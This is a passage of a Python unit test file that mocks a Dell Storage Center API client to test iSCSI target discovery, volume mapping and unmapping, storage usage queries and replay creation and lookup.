@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_by_address(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find iSCSI mappings by IP Address & port
res = self.scapi.find_iscsi_properties(
self.VOLUME, '192.168.0.21', 3260)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_by_address_not_found(
self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_ctrl,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where iSCSI mappings searched by IP address & port are not found
res = self.scapi.find_iscsi_properties(
self.VOLUME, '192.168.1.21', 3260)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_ctrl.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[])
def test_find_iscsi_properties_no_mapping(self,
mock_find_mappings,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are no ScMapping(s)
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_iscsi_properties,
self.VOLUME)
self.assertTrue(mock_find_mappings.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_no_domain(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are no ScFaultDomain(s)
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_iscsi_properties,
self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_no_ctrl_port(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
        # Test case where there is no ScControllerPort
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_iscsi_properties,
self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS_READ_ONLY)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_ro(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where Read Only mappings are found
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS_MULTI_PORTALS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS_MULTI_PORTAL)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_multi_portals(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are multiple portals
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
self.assertTrue(mock_is_virtualport_mode.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1, 1, 1, 1],
'target_portal': u'192.168.0.25:3260',
'target_portals': [u'192.168.0.21:3260',
u'192.168.0.25:3260',
u'192.168.0.21:3260',
u'192.168.0.25:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.5764839588723736131.91')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_mappings_legacy(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
self.assertTrue(mock_find_active_controller.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.5764839588723736131.91')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=None)
def test_find_iscsi_properties_mappings_legacy_no_iscsi_config(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_iscsi_properties,
self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
self.assertTrue(mock_find_active_controller.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_by_address_legacy(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find iSCSI mappings by IP Address & port
res = self.scapi.find_iscsi_properties(
self.VOLUME, '192.168.0.21', 3260)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_by_address_not_found_legacy(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_ctrl,
mock_close_connection,
mock_open_connection,
mock_init):
        # Test case where the given IP address & port do not match any mapping
res = self.scapi.find_iscsi_properties(
self.VOLUME, '192.168.1.21', 3260)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_ctrl.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS_READ_ONLY)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_ro_legacy(self,
mock_find_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where Read Only mappings are found
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
self.assertTrue(mock_find_iscsi_config.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS_MULTI_PORTAL)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_multi_portals_legacy(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are multiple portals
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
        # Since the same controller port info is returned for every mapping,
        # the target information is duplicated.
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1, 1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260',
u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=MAP_PROFILE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=[])
def test_map_volume(self,
mock_find_mapping_profiles,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
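        # Test case where no mapping exists and a new one is created.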
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.MAP_PROFILE, res, 'Incorrect ScMappingProfile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=MAP_PROFILE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
def test_map_volume_existing_mapping(self,
mock_find_mappings,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
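        # Test case where a mapping profile already exists; no new POST.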
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mappings.called)
self.assertFalse(mock_post.called)
self.assertFalse(mock_first_result.called)
self.assertEqual(self.MAP_PROFILE, res, 'Incorrect ScMappingProfile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=MAP_PROFILE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=[])
def test_map_volume_existing_mapping_not_us(self,
mock_find_mappings,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
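        # Test case where existing mappings are not for this server, so
        # a new mapping profile is created.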
server = {'instanceId': 64702.48, 'name': 'Server X'}
res = self.scapi.map_volume(self.VOLUME,
server)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.MAP_PROFILE, res, 'Incorrect ScMappingProfile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
def test_map_volume_no_vol_id(self,
mock_post,
mock_first_result,
mock_get_id,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume instanceId is None
mock_get_id.side_effect = [None, '64702.47']
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertFalse(mock_post.called)
self.assertFalse(mock_first_result.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
def test_map_volume_no_server_id(self,
mock_post,
mock_first_result,
mock_get_id,
mock_close_connection,
mock_open_connection,
mock_init):
        # Test case where ScServer instanceId is None
mock_get_id.side_effect = ['64702.3494', None]
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertFalse(mock_post.called)
self.assertFalse(mock_first_result.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=[])
def test_map_volume_failure(self,
mock_find_mapping_profiles,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where mapping volume to server fails
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value={'result': True})
def test_unmap_volume(self,
mock_get_json,
mock_find_mapping_profiles,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
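        # Test case where the mapping profile is found and deleted.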
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_delete.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_204)
def test_unmap_volume_failure(self,
mock_delete,
mock_find_mapping_profiles,
mock_close_connection,
mock_open_connection,
mock_init):
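        # Test case where the delete of the mapping profile fails.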
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_delete.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=[])
def test_unmap_volume_no_map_profile(self,
mock_find_mapping_profiles,
mock_close_connection,
mock_open_connection,
mock_init):
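        # Test case where there is no mapping profile to delete.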
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_204)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
def test_unmap_volume_del_fail(self,
mock_find_mapping_profiles,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_delete.called)
        self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
def test_unmap_volume_no_vol_id(self,
mock_find_mapping_profiles,
mock_delete,
mock_get_id,
mock_close_connection,
mock_open_connection,
mock_init):
        # Test case where ScVolume instanceId is None
mock_get_id.side_effect = [None, '64702.47']
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertFalse(mock_find_mapping_profiles.called)
self.assertFalse(mock_delete.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
def test_unmap_volume_no_server_id(self,
mock_find_mapping_profiles,
mock_delete,
mock_get_id,
mock_close_connection,
mock_open_connection,
mock_init):
        # Test case where ScServer instanceId is None
mock_get_id.side_effect = ['64702.3494', None]
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertFalse(mock_find_mapping_profiles.called)
self.assertFalse(mock_delete.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[{'a': 1}, {'a': 2}])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_controller_port_iscsi_config(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Not much to test here. Just make sure we call our stuff and
# that we return the first item returned to us.
res = self.scapi._find_controller_port_iscsi_config('guid')
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual({'a': 1}, res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_controller_port_iscsi_config_err(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_controller_port_iscsi_config('guid')
self.assertTrue(mock_get.called)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=STRG_USAGE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_get_storage_usage(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.get_storage_usage()
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.STRG_USAGE, res, 'Unexpected ScStorageUsage')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
def test_get_storage_usage_no_ssn(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where SSN is none
self.scapi.ssn = None
res = self.scapi.get_storage_usage()
self.scapi.ssn = 12345
self.assertFalse(mock_get.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
    def test_get_storage_usage_failure(self,
                                       mock_get,
                                       mock_close_connection,
                                       mock_open_connection,
                                       mock_init):
        # Test case where the get of Storage Usage fails
res = self.scapi.get_storage_usage()
self.assertTrue(mock_get.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=RPLAY)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_replay(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
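        # Test case where an ScReplay is created with an expiration time.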
res = self.scapi.create_replay(self.VOLUME,
'Test Replay',
60)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.RPLAY, res, 'Unexpected ScReplay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=RPLAY)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_volume')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_replay_inact_vol(self,
mock_post,
mock_init_volume,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the specified volume is inactive
res = self.scapi.create_replay(self.INACTIVE_VOLUME,
'Test Replay',
60)
self.assertTrue(mock_post.called)
mock_init_volume.assert_called_once_with(self.INACTIVE_VOLUME)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.RPLAY, res, 'Unexpected ScReplay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=RPLAY)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_replay_no_expire(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
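        # Test case where the ScReplay is created with no expiration.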
res = self.scapi.create_replay(self.VOLUME,
'Test Replay',
0)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.RPLAY, res, 'Unexpected ScReplay')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_replay_no_volume(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where no ScVolume is specified
res = self.scapi.create_replay(None,
'Test Replay',
60)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_create_replay_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where create ScReplay fails
res = self.scapi.create_replay(self.VOLUME,
'Test Replay',
60)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_replay(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
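        # Test case where the named replay is found for the volume.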
res = self.scapi.find_replay(self.VOLUME,
u'Cinder Test Replay012345678910')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.TST_RPLAY, res, 'Unexpected ScReplay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_replay_no_replays(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where no replays are found
res = self.scapi.find_replay(self.VOLUME,
u'Cinder Test Replay012345678910')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
